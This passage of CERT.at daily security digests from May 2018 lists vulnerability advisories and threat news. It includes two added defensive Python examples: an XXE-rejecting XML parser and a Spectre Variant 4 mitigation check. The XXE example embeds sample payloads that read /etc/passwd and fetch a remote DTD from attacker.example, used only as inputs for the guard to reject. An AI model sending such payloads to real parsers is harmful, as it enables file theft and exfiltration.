As we have previously discussed on this blog, surreptitious cryptomining continues to be a problem as new methods emerge to both evade and hasten the ease of mining at the expense of system administrators, website owners, and their visitors. Another Way Hackers are Tricking Website Visitors into Stealth Cryptomining [...]
---------------------------------------------
https://blog.sucuri.net/2018/05/cryptomining-through-disguised-url-shortene…
∗∗∗ CPU vulnerabilities Spectre-NG: updates and information links ∗∗∗
---------------------------------------------
Hardware, operating-system and software vendors are providing web pages with information and security updates for the new Spectre vulnerabilities Spectre V3a and Spectre V4: an overview.
---------------------------------------------
https://www.heise.de/ct/artikel/CPU-Sicherheitsluecken-Spectre-NG-Updates-u…
∗∗∗ Attackers could hijack current BMW models over the mobile network ∗∗∗
---------------------------------------------
Security researchers exploited vulnerabilities in the infotainment system of several BMW models and took control of it. A remote attack, however, takes considerable effort.
---------------------------------------------
https://www.heise.de/security/meldung/Angreifer-koennten-aktuelle-BMW-Model…
∗∗∗ Efail: How secure are which e-mail clients? ∗∗∗
---------------------------------------------
Since the publication of the Efail vulnerabilities in PGP and S/MIME there has been much uncertainty among users who encrypt their e-mail. We took a detailed look at which e-mail programs have been hardened so far, and how.
---------------------------------------------
https://www.heise.de/security/meldung/Efail-Welche-E-Mail-Clients-sind-wie-…
∗∗∗ Purported Lilihill DevCon GmbH sends malware ∗∗∗
---------------------------------------------
Fraudsters posing as Lilihill DevCon GmbH are mass-mailing malware to companies. Recipients find an e-mail from sales(a)european-gmbh.pw with the subject "AW: Zahlung – EWT" in their inbox. It asks them to open a ZIP file attached to the mail. Caution: the file contains malware and must not be opened.
---------------------------------------------
https://www.watchlist-internet.at/news/angebliche-lilihill-devcon-gmbh-vers…
=====================
= Vulnerabilities =
=====================
∗∗∗ VMware Workstation and Fusion: Multiple vulnerabilities ∗∗∗
---------------------------------------------
VMware's virtualisation software allows several operating systems to run simultaneously on one host system.
---------------------------------------------
https://www.bsi-fuer-buerger.de/SharedDocs/Warnmeldungen/DE/TW/2018/05/warn…
∗∗∗ [20180505] - Core - XSS Vulnerabilities & additional hardening ∗∗∗
---------------------------------------------
Project: Joomla! SubProject: CMS Impact: Moderate Severity: Moderate Versions: 3.0.0 through 3.8.7
---------------------------------------------
https://developer.joomla.org/security-centre/733-20180505-core-xss-vulnerab…
∗∗∗ Synology-SA-18:25 SRM ∗∗∗
---------------------------------------------
A vulnerability allows remote attackers to inject arbitrary web script or HTML via a susceptible version of Synology Router Manager (SRM).
---------------------------------------------
https://www.synology.com/en-global/support/security/Synology_SA_18_25
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by CentOS (java-1.7.0-openjdk, java-1.8.0-openjdk, kernel, libvirt, and qemu-kvm), Debian (procps), Fedora (curl, mariadb, and procps-ng), Gentoo (samba, shadow, and virtualbox), openSUSE (opencv, openjpeg2, pdns, qemu, and wget), Oracle (java-1.8.0-openjdk and kernel), Red Hat (java-1.7.0-openjdk, java-1.8.0-openjdk, kernel, kernel-rt, libvirt, qemu-kvm, qemu-kvm-rhev, redhat-virtualization-host, and vdsm), Scientific Linux (java-1.7.0-openjdk, [...]
---------------------------------------------
https://lwn.net/Articles/755386/
∗∗∗ Vuln: Apache Solr CVE-2018-8010 XML External Entity Multiple Information Disclosure Vulnerabilities ∗∗∗
---------------------------------------------
http://www.securityfocus.com/bid/104239
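The SoMachine Basic fix above and this Apache Solr entry are both XML external entity (XXE) issues: a parser that honours a DOCTYPE with an external entity will read local files or fetch remote URLs on the attacker's behalf. The check below is an added example, not code from Schneider Electric, Apache Solr or either advisory. It uses only Python's standard-library expat bindings to refuse any input that carries a DOCTYPE, an entity declaration or an external entity reference before application code sees it; the sample documents, the host name attacker.example and the tag names are constructed for illustration.

```python
"""Reject untrusted XML that declares a DTD before it reaches the application.

Added example for the XXE entries in this digest; it is not code from any of
the affected products. Only the standard-library expat parser is used.
"""
import xml.parsers.expat as expat


class DtdRejected(ValueError):
    """Raised when the input carries a DOCTYPE, an entity declaration or an
    external entity reference, i.e. the building blocks of an XXE payload."""


def _reject_doctype(name, sysid, pubid, has_internal_subset):
    raise DtdRejected(f"DOCTYPE {name!r} not allowed (system id {sysid!r})")


def _reject_entity(name, is_param, value, base, sysid, pubid, notation):
    raise DtdRejected(f"entity declaration {name!r} not allowed")


def _reject_external(context, base, sysid, pubid):
    raise DtdRejected(f"external entity reference {sysid!r} not allowed")


def parse_untrusted_xml(data: bytes) -> dict:
    """Parse `data` and return {tag: text} for the direct children of the root
    element. Any DTD construct aborts parsing with DtdRejected, because expat
    calls the DOCTYPE handler before it processes the internal subset."""
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.StartDoctypeDeclHandler = _reject_doctype
    parser.EntityDeclHandler = _reject_entity
    parser.ExternalEntityRefHandler = _reject_external

    result = {}
    depth = 0
    current = None

    def start(tag, attrs):
        nonlocal depth, current
        depth += 1
        if depth == 2:          # direct child of the root element
            current = tag
            result[tag] = ""

    def end(tag):
        nonlocal depth, current
        if depth == 2:
            current = None
        depth -= 1

    def chars(text):
        # expat may deliver text in several chunks; concatenate them.
        if current is not None:
            result[current] += text

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    parser.Parse(data, True)
    return result


def is_rejected(data: bytes) -> bool:
    """True if the guard refuses `data` (used by the demo and the test)."""
    try:
        parse_untrusted_xml(data)
    except DtdRejected:
        return True
    return False


# Constructed sample documents (not taken from either advisory).
BENIGN = b"<?xml version='1.0'?><config><host>plc-01</host><port>502</port></config>"
# Classic file-read XXE: the entity would expand to the file contents.
XXE_FILE = (b"<?xml version='1.0'?>"
            b"<!DOCTYPE r [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>"
            b"<config><host>&xxe;</host></config>")
# Out-of-band variant: a parameter entity pulls a remote DTD.
XXE_OOB = (b"<?xml version='1.0'?>"
           b"<!DOCTYPE r [<!ENTITY % p SYSTEM \"http://attacker.example/x.dtd\"> %p;]>"
           b"<config/>")

if __name__ == "__main__":
    print("benign ->", parse_untrusted_xml(BENIGN))
    for name, doc in (("file XXE", XXE_FILE), ("OOB XXE", XXE_OOB)):
        print(f"{name} rejected: {is_rejected(doc)}")
```

Rejecting the DTD outright is the safe default for any interface that only ever receives plain documents; if an application legitimately needs internal DTDs, keep the entity and external-reference handlers and drop only the DOCTYPE one.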
∗∗∗ Security Advisory - Three JSON Injection Vulnerabilities in Huawei Some Products ∗∗∗
---------------------------------------------
http://www.huawei.com//www.huawei.com/en/psirt/security-advisories/2018/hua…
∗∗∗ Security Advisory - Information Exposure Vulnerability in Some Smart Phones ∗∗∗
---------------------------------------------
http://www.huawei.com//www.huawei.com/en/psirt/security-advisories/2018/hua…
∗∗∗ Security Advisory - Authentication Bypass Vulnerability in Some Huawei Servers ∗∗∗
---------------------------------------------
http://www.huawei.com//www.huawei.com/en/psirt/security-advisories/2018/hua…
∗∗∗ Security Advisory - Numeric Errors Vulnerability in Some Huawei Products ∗∗∗
---------------------------------------------
http://www.huawei.com//www.huawei.com/en/psirt/security-advisories/2018/hua…
∗∗∗ IBM Security Bulletin: Vulnerabilities in OpenSSL affect IBM Netezza Firmware Diagnostics. ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22012498
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM License Metric Tool v9 and IBM BigFix Inventory v9 ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22015655
∗∗∗ IBM Security Bulletin: Apache Tomcat vulnerability affects IBM Storwize V7000 Unified (CVE-2017-15706) ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=ssg1S1012273
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities affect the IBM Storwize V7000 Unified ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=ssg1S1012293
∗∗∗ IBM Security Bulletin: Multiple Vulnerabilities in IBM Java Runtime affects IBM Storwize V7000 Unified ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=ssg1S1012274
∗∗∗ IBM Security Bulletin: IBM Tivoli Netcool Impact is affected by a potential spoofing attack in IBM WebSphere Application Server vulnerability (CVE-2017-1788) ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22016546
∗∗∗ IBM Security Bulletin: Multiple Samba vulnerability affects IBM Storwize V7000 Unified (CVE-2017-15275, CVE-2017-14746 ) ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=ssg1S1012289
∗∗∗ IBM Security Bulletin: IBM Tivoli Netcool Impact is affected by a potential denial of service used by IBM WebSphere Application Server vulnerability (CVE-2017-12624) ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22016545
∗∗∗ IBM Security Bulletin: Authenticated Users in IBM UrbanCode Deploy can Obtain Secure Properties (CVE-2017-1752) ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg2C1000376
∗∗∗ IBM Security Bulletin: Vulnerability in Apache Commons FileUpload affects Tivoli Netcool/OMNIbus WebGUI (CVE-2016-1000031) ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22016488
=====================
= End-of-Day report =
=====================
Timeframe: Friday 18-05-2018 18:00 − Tuesday 22-05-2018 18:00
Handler: Robert Waldner
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Security updates: attacks on DrayTek routers ∗∗∗
---------------------------------------------
Unknown attackers are currently targeting various DrayTek routers. Once a compromise succeeds, they alter the DNS settings.
---------------------------------------------
https://heise.de/-4053059
=====================
= Vulnerabilities =
=====================
∗∗∗ VU#180049: CPU hardware utilizing speculative execution may be vulnerable to cache side-channel attacks ∗∗∗
---------------------------------------------
CPU hardware utilizing speculative execution may be vulnerable to cache timing side-channel analysis. Also known as "Variant 4" or "SpectreNG".
---------------------------------------------
http://www.kb.cert.org/vuls/id/180049
∗∗∗ Firewall information leak to regular SSL VPN web portal users ∗∗∗
---------------------------------------------
A SSL VPN user logged in via the web portal can access internal FortiOS configuration information (eg: addresses) via specifically crafted URLs.
---------------------------------------------
https://fortiguard.com/psirt/FG-IR-17-231
∗∗∗ Xen Security Advisory CVE-2018-3639 / XSA-263 ∗∗∗
---------------------------------------------
[...] However, in most configurations, within-guest information leak is possible. Mitigation for this generally depends on guest changes (for which you must consult your OS vendor) *and* on hypervisor support, provided in this advisory.
---------------------------------------------
http://xenbits.xen.org/xsa/advisory-263.html
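VU#180049 and XSA-263 above both point out that Variant 4 (Speculative Store Bypass, CVE-2018-3639) needs a guest-side fix as well as hypervisor support. The script below is an added example, not from CERT/CC, Xen or any vendor, showing how to check the guest side on Linux: it classifies the status strings the kernel exposes under /sys/devices/system/cpu/vulnerabilities and asks the kernel via prctl(2) whether the calling process has SSB disabled. The two sysfs snapshots in the block are constructed for illustration.

```python
"""Check a Linux guest for the Variant 4 / Speculative Store Bypass mitigation.

Added example for VU#180049 and XSA-263; not code from either advisory.
"""
from __future__ import annotations

import ctypes
import os
import sys

SYSFS_DIR = "/sys/devices/system/cpu/vulnerabilities"

# prctl(2) speculation-control constants from <linux/prctl.h>
PR_GET_SPECULATION_CTRL = 52
PR_SPEC_STORE_BYPASS = 0
PR_SPEC_NOT_AFFECTED = 0
PR_SPEC_PRCTL = 1 << 0
PR_SPEC_ENABLE = 1 << 1
PR_SPEC_DISABLE = 1 << 2
PR_SPEC_FORCE_DISABLE = 1 << 3


def classify(status: str) -> str:
    """Map one sysfs status line to 'not_affected', 'mitigated', 'vulnerable'
    or 'unknown'. The kernel writes 'Not affected', 'Vulnerable[: ...]' or
    'Mitigation: ...' into each file in the vulnerabilities directory."""
    s = status.strip()
    if s == "Not affected":
        return "not_affected"
    if s.startswith("Mitigation:"):
        return "mitigated"
    if s.startswith("Vulnerable"):
        return "vulnerable"
    return "unknown"


def audit(entries: dict[str, str]) -> dict[str, str]:
    """Classify every entry given as {file name: file content}."""
    return {name: classify(content) for name, content in entries.items()}


def read_sysfs(path: str = SYSFS_DIR) -> dict[str, str]:
    """Read the live sysfs directory; empty if the kernel predates it."""
    entries: dict[str, str] = {}
    if not os.path.isdir(path):
        return entries
    for name in sorted(os.listdir(path)):
        with open(os.path.join(path, name)) as fh:
            entries[name] = fh.read()
    return entries


def ssb_prctl_state() -> str | None:
    """Ask the kernel whether this process may speculate past stores.
    Returns None where prctl is unavailable (non-Linux, old kernel)."""
    if not sys.platform.startswith("linux"):
        return None
    libc = ctypes.CDLL(None, use_errno=True)
    res = libc.prctl(PR_GET_SPECULATION_CTRL, PR_SPEC_STORE_BYPASS, 0, 0, 0)
    if res < 0:
        return None                      # EINVAL: interface not present
    if res == PR_SPEC_NOT_AFFECTED:
        return "not_affected"
    if res & (PR_SPEC_DISABLE | PR_SPEC_FORCE_DISABLE):
        return "disabled"                # mitigation active for this process
    return "enabled"                     # speculation allowed; opt in via prctl/seccomp


# Constructed sysfs snapshots (not captured from a real host).
SAMPLE_PATCHED = {
    "spec_store_bypass": "Mitigation: Speculative Store Bypass disabled via prctl and seccomp\n",
    "meltdown": "Mitigation: PTI\n",
    "spectre_v1": "Not affected\n",
}
SAMPLE_UNPATCHED = {
    "spec_store_bypass": "Vulnerable\n",
    "meltdown": "Mitigation: PTI\n",
}

if __name__ == "__main__":
    live = read_sysfs()
    print("sysfs:", audit(live) if live else "no vulnerabilities directory")
    print("SSB for this process:", ssb_prctl_state())
```

A status of "Mitigation: ... via prctl and seccomp" means the kernel can disable SSB but does so only for processes that ask; a sandboxed process gets it through seccomp, everything else stays in the "enabled" state the prctl query reports. On a Xen guest the sysfs line reflects the guest kernel only; the hypervisor side still has to be patched per XSA-263.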
∗∗∗ HPSBHF02981 rev.3 - HPE Integrated Lights-Out 2, 3, 4, 5 (iLO 2, iLO 3, iLO 4, and iLO 5) and HPE Superdome Flex RMC - IPMI 2.0 RMCP+ Authentication Remote Password Hash Vulnerability (RAKP) ∗∗∗
---------------------------------------------
A potential security vulnerability has been identified in HPE Integrated Lights-Out 2, 3, 4, 5 (iLO 2, iLO 3, iLO 4, and iLO 5) and HPE Superdome Flex RMC. The vulnerability could be exploited to allow an attacker to gain unauthorized privileges and unauthorized access to privileged information.
---------------------------------------------
https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_n…
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by Arch Linux (lib32-curl, lib32-libcurl-compat, lib32-libcurl-gnutls, libcurl-compat, and libcurl-gnutls), CentOS (firefox), Debian (imagemagick), Fedora (exiv2, LibRaw, and love), Gentoo (chromium), Mageia (kernel, librelp, and miniupnpc), openSUSE (curl, enigmail, ghostscript, libvorbis, lilypond, and thunderbird), Red Hat (Red Hat OpenStack Platform director), and Ubuntu (firefox).
---------------------------------------------
https://lwn.net/Articles/755076/
∗∗∗ Security vulnerabilities fixed in Thunderbird 52.8 ∗∗∗
---------------------------------------------
* CVE-2018-5183: Backport critical security fixes in Skia
* CVE-2018-5184: Full plaintext recovery in S/MIME via chosen-ciphertext attack
* CVE-2018-5154: Use-after-free with SVG animations and clip paths
* CVE-2018-5155: Use-after-free with SVG animations and text paths
...
---------------------------------------------
https://www.mozilla.org/en-US/security/advisories/mfsa2018-13/
∗∗∗ Security Notice -Statement on the Side-Channel Vulnerability Variants 3a and 4 ∗∗∗
---------------------------------------------
http://www.huawei.com//www.huawei.com/en/psirt/security-notices/2018/huawei…
∗∗∗ Security Advisory - Stack Overflow Vulnerability in Baseband Module of Some Huawei Smart Phones ∗∗∗
---------------------------------------------
http://www.huawei.com//www.huawei.com/en/psirt/security-advisories/2017/hua…
∗∗∗ IBM Security Bulletin: Vulnerability in Apache Tomcat affects IBM Platform Symphony, IBM Spectrum Symphony (CVE-2017-15698, CVE-2017-15706, CVE-2018-1323, CVE-2018-1305, CVE-2018-1304) ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=isg3T1027633
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in the GSKit component of Tivoli Netcool/OMNIbus ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg21974627
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect Tivoli Netcool/OMNIbus (Multiple CVEs) ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22012415
∗∗∗ IBM Security Bulletin: A vulnerability in Apache Commons FileUpload affects the IBM Performance Management product (CVE-2016-1000031) ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22016122
∗∗∗ IBM Security Bulletin: Atlas eDiscovery Process Management is affected by Apache Open Source Commons FileUpload Vulnerability ∗∗∗
---------------------------------------------
https://www-01.ibm.com/support/docview.wss?uid=swg22014477
∗∗∗ IBM Security Bulletin: Open Source Commons FileUpload Apache Vulnerabilities (CVE-2016-1000031) ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22016234
∗∗∗ IBM Security Bulletin: A vulnerability in IBM WebSphere Application Server Liberty affects the IBM Performance Management product (CVE-2017-1681) ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22015310
∗∗∗ IBM Security Bulletin: Vulnerability in IBM Java SDK affects IBM SONAS ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=ssg1S1012317
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect Rational Directory Server (Tivoli) & Rational Directory Administrator ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22016185
∗∗∗ IBM Security Bulletin: Multiple Mozilla Firefox vulnerability issues in IBM SONAS ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=ssg1S1012291
∗∗∗ IBM Security Bulletin: Multiple Samba vulnerabilities affect IBM SONAS ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=ssg1S1012292
∗∗∗ Java Bouncy Castle vulnerability CVE-2015-7940 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K10105323
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 17-05-2018 18:00 − Friday 18-05-2018 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ DrayTek Router Zero-Day Under Attack ∗∗∗
---------------------------------------------
DrayTek, a Taiwan-based manufacturer of broadband CPE (Customer Premises Equipment) such as routers, switches, firewalls, and VPN devices, announced today that hackers are exploiting a zero-day vulnerability to change DNS settings on some of its routers.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/draytek-router-zero-day-unde…
∗∗∗ Business Email Compromise incidents, (Fri, May 18th) ∗∗∗
---------------------------------------------
Over the past 12 months we have seen a sharp increase in the number of incidents relating to the compromise of business e-mail accounts. Often O365, but also some Gmail and on-premises systems with webmail access.
---------------------------------------------
https://isc.sans.edu/diary/rss/23669
∗∗∗ MEWKit phishing campaign steals MyEtherWallet credentials to perform automated fund transfers ∗∗∗
---------------------------------------------
The cybercriminals who last April executed a man-in-the-middle attack on an Amazon DNS server to steal $152,000 in Ethereum cryptocurrency from MyEtherWallet.com pulled off their heist using a newly discovered phishing kit that includes an automated transfer system (ATS) malware component.
---------------------------------------------
https://www.scmagazine.com/mewkit-phishing-campaign-steals-myetherwallet-cr…
∗∗∗ WordPress 4.9.6 Privacy and Maintenance Release ∗∗∗
---------------------------------------------
WordPress 4.9.6 is now available. This is a privacy and maintenance release. We encourage you to update your sites to take advantage of the new privacy features.
---------------------------------------------
https://wordpress.org/news/2018/05/wordpress-4-9-6-privacy-and-maintenance-…
∗∗∗ Spectre-NG: patches expected on Whit Monday ∗∗∗
---------------------------------------------
Mind your holiday planning: Intel is preparing updates against the first Spectre Next Generation vulnerabilities for 21 May. Concrete information on the vulnerabilities is expected to be published at the same time.
---------------------------------------------
https://www.heise.de/-4051247
∗∗∗ Updates fix a nasty hole in Signal's desktop app ∗∗∗
---------------------------------------------
With simple messages an attacker could inject HTML code into the desktop app of the encrypting messenger and thereby even read all of the victim's messages. The current version 1.11 closes these holes.
---------------------------------------------
https://www.heise.de/-4052040
∗∗∗ WhatsApp will not become a paid service ∗∗∗
---------------------------------------------
A message is currently circulating on WhatsApp claiming that the messenger service will become chargeable in future. Users can supposedly avoid the charges by forwarding the notice to ten of their contacts. These claims are false: the message is a made-up chain letter and can safely be deleted.
---------------------------------------------
https://www.watchlist-internet.at/news/whatsapp-wird-nicht-kostenpflichtig/
=====================
= Vulnerabilities =
=====================
∗∗∗ Medtronic NVision Clinician Programmer ∗∗∗
---------------------------------------------
This medical advisory includes mitigations for a missing encryption of sensitive data vulnerability in Medtronic's NVision Clinician Programmer.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSMA-18-137-01
∗∗∗ GE PACSystems CPE305/310, CPE330, CPE400, RSTi-EP CPE 100, CPU320/CRU320, RXi ∗∗∗
---------------------------------------------
This advisory includes mitigations for an improper input validation vulnerability in the GE PACSystems CPE305/310, CPE330, CPE400, RSTi-EP CPE 100, CPU320/CRU320, RXi industrial Internet controllers.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-18-137-01
∗∗∗ PHOENIX CONTACT FL SWITCH 3xxx/4xxx/48xx Series ∗∗∗
---------------------------------------------
This advisory includes mitigations for command injection, information exposure, and stack-based buffer overflow vulnerabilities in the PHOENIX CONTACT FL SWITCH 3xxx/4xxx/48xx Series.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-18-137-02
∗∗∗ Delta Electronics Delta Industrial Automation TPEditor ∗∗∗
---------------------------------------------
This advisory includes mitigations for a heap-based buffer overflow vulnerability in the Delta Electronics Delta Industrial Automation TPEditor.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-18-137-04
∗∗∗ Client for Open Enterprise Server 2 SP4 (IR8a) ∗∗∗
---------------------------------------------
Abstract: This is the interim release (IR8a) of Client for Open Enterprise Server 2 SP4 (formerly "Novell Client 2 SP4 for Windows"). It includes fixes for problems found after Client for Open Enterprise Server 2 SP4 was released. It also includes support for Microsoft Windows Server 2016.
---------------------------------------------
https://download.novell.com/Download?buildid=wdhtRhxCLdg~
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by Arch Linux (curl and zathura-pdf-mupdf), Debian (libmad and vlc), openSUSE (enigmail), Red Hat (collectd, Red Hat OpenStack Platform director, and sensu), and SUSE (firefox, ghostscript, and mysql).
---------------------------------------------
https://lwn.net/Articles/754854/
∗∗∗ Red Hat JBoss Enterprise Application Platform: A vulnerability allows execution of arbitrary code ∗∗∗
---------------------------------------------
https://adv-archiv.dfn-cert.de/adv/2018-0955/
∗∗∗ IBM Security Bulletin: IBM StoredIQ is affected by a privilege escalation vulnerability ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22016465
∗∗∗ IBM Security Bulletin: IBM BigFix Platform is affected by multiple vulnerabilities (CVE-2017-3735, CVE-2017-1000100, CVE-2017-1000254) ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22011879
Next End-of-Day report: 2018-05-22
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 16-05-2018 18:00 − Thursday 17-05-2018 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Oh, great, now there's a SECOND remote Rowhammer exploit ∗∗∗
---------------------------------------------
Send enough crafted packets to a NIC to put nasties into RAM, then the fun really starts. Hard on the heels of the first network-based Rowhammer attack, some of the boffins involved in discovering Meltdown/Spectre have shown off their own technique for flipping bits using network requests.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2018/05/17/nethammer_s…
∗∗∗ The Rowhammer: the Evolution of a Dangerous Attack ∗∗∗
---------------------------------------------
Back in 2015, security researchers at Google's Project Zero team demonstrated how to hijack Intel-compatible PCs running Linux by exploiting physical weaknesses in certain varieties of DDR DRAM (double data rate dynamic random-access memory) chips. The attack technique devised by the experts was dubbed "Rowhammer" [...]
---------------------------------------------
http://resources.infosecinstitute.com/rowhammer-evolution-dangerous-attack-…
∗∗∗ TeleGrab - Grizzly Attacks on Secure Messaging ∗∗∗
---------------------------------------------
This post was written by Vitor Ventura with contributions from Azim Khodjibaev. Over the past month and a half, Talos has seen the emergence of malware that collects cache and key files from the end-to-end encrypted instant messaging service Telegram. This malware was first seen on April 4, 2018, with a second variant emerging on April 10.
---------------------------------------------
https://blog.talosintelligence.com/2018/05/telegrab.html
∗∗∗ Ignore payment reminders for 479.16 euros from DEBTSOLUTIONS LTD! ∗∗∗
---------------------------------------------
Affected internet users find a purported final payment demand, ahead of debt-collection proceedings, from Debtsolutions LTD in their inbox. The stated reason is that a fraudulent invoice from MOVIES DARLING LTD was not paid. Recipients are therefore told to transfer 479.16 euros to Debtsolutions LTD. But beware! This letter is fraudulent as well, and the amount should under no circumstances be paid.
---------------------------------------------
https://www.watchlist-internet.at/news/mahnungen-ueber-47916-euro-der-debts…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates: Cisco once again forgets a default password in network software ∗∗∗
---------------------------------------------
Cisco has released important patches, closing security holes across its product portfolio. Three of the vulnerabilities are rated extremely critical.
---------------------------------------------
https://www.heise.de/meldung/Sicherheitsupdates-Cisco-vergisst-mal-wieder-S…
∗∗∗ SECURITY BULLETIN: Trend Micro Endpoint Application Control FileDrop Directory Traversal Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
Trend Micro has released a new critical patch (CP) for Trend Micro Endpoint Application Control 2.0 SP1. This CP resolves a FileDrop directory traversal remote code execution (RCE) vulnerability.
---------------------------------------------
https://success.trendmicro.com/solution/1119811
∗∗∗ [R1] Industrial Security 1.1.0 Fixes One Third-party Vulnerability ∗∗∗
---------------------------------------------
Industrial Security leverages third-party software to help provide underlying functionality. One of the third-party components (OpenSSL) was found to contain vulnerabilities, and updated versions have been made available by the providers.
---------------------------------------------
https://www.tenable.com/security/tns-2018-06
∗∗∗ [R1] Nessus Network Monitor 5.5.0 Fixes One Third-party Vulnerability ∗∗∗
---------------------------------------------
Nessus Network Monitor leverages third-party software to help provide underlying functionality. One of the third-party components (OpenSSL) was found to contain vulnerabilities, and updated versions have been made available by the providers.
---------------------------------------------
https://www.tenable.com/security/tns-2018-07
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by Arch Linux (runc), Debian (curl), Fedora (xdg-utils), Mageia (firefox), openSUSE (libreoffice, librsvg, and php5), Slackware (curl and php), SUSE (curl, firefox, kernel, kvm, libapr1, libvorbis, and memcached), and Ubuntu (curl, dpdk, php5, and qemu).
---------------------------------------------
https://lwn.net/Articles/754773/
∗∗∗ Vuln: Symantec IntelligenceCenter CVE-2017-18268 Information Disclosure Vulnerability ∗∗∗
---------------------------------------------
http://www.securityfocus.com/bid/104164
∗∗∗ Vuln: Symantec SSLV CVE-2017-15533 Information Disclosure Vulnerability ∗∗∗
---------------------------------------------
http://www.securityfocus.com/bid/104163
∗∗∗ 2018-05-15: Vulnerability in Welcome IP-Gateway - Command Injection, Missing Session Management, Clear Text Passwords in Cookies ∗∗∗
---------------------------------------------
http://search.abb.com/library/Download.aspx?DocumentID=ABB-VU-EPBP-R-2505&L…
∗∗∗ FortiWeb Recursive URL Decoding is not enabled by default ∗∗∗
---------------------------------------------
https://fortiguard.com/psirt/FG-IR-18-058
∗∗∗ FortiOS SSL Deep-Inspection badssl.com Compliance ∗∗∗
---------------------------------------------
https://fortiguard.com/psirt/FG-IR-17-160
∗∗∗ IBM Security Bulletin: Vulnerabilities in Linux Kernel affect Intel® Manycore Platform Software Stack (Intel® MPSS) for Linux and Windows ∗∗∗
---------------------------------------------
https://www.ibm.com/support/home/docdisplay?lndocid=MIGR-5099805
∗∗∗ IBM Security Bulletin: Vulnerabilities in cURL/libcurl affect Intel® Manycore Platform Software Stack (Intel® MPSS) for Linux and Windows ∗∗∗
---------------------------------------------
https://www.ibm.com/support/home/docdisplay?lndocid=MIGR-5099804
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities within Jackson JSON library affect IBM Business Automation Workflow (CVE-2017-17485, CVE-2018-5968, CVE-2018-7489) ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22015305
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java JRE affect IBM Tivoli Monitoring ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22016198
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in GSKit bundled with IBM HTTP Server ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22015347
∗∗∗ IBM Security Bulletin: Vulnerability in IBM WebSphere Application Server Affects IBM Emptoris Sourcing, IBM Emptoris Contract Management, IBM Emptoris Spend Analysis, IBM Emptoris Program Management and IBM Emptoris Service Procurement ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22016159
∗∗∗ IBM Security Bulletin: A Vulnerability in IBM Java Runtime Affects Optim Data Growth, Test Data Management and Application Retirement ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22014553
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM Java Runtime affect Rational Business Developer ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22016029
∗∗∗ IBM Security Bulletin: IBM Cloud Orchestrator and IBM Cloud Orchestrator Enterprise edition are affected by James Clark Expat Vulnerabilities ∗∗∗
